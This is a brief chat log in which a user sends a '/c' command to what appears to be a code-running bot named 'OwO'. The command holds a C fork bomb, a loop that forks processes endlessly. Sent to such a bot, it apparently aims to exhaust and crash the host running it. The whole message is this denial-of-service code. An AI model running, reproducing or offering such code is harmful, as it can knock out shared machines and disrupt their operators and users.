Licson Lee says to OwO
Licson Lee: /c #include <stdio.h> #include <unistd.h> int main(){ while(true){ fork(); } return 0; }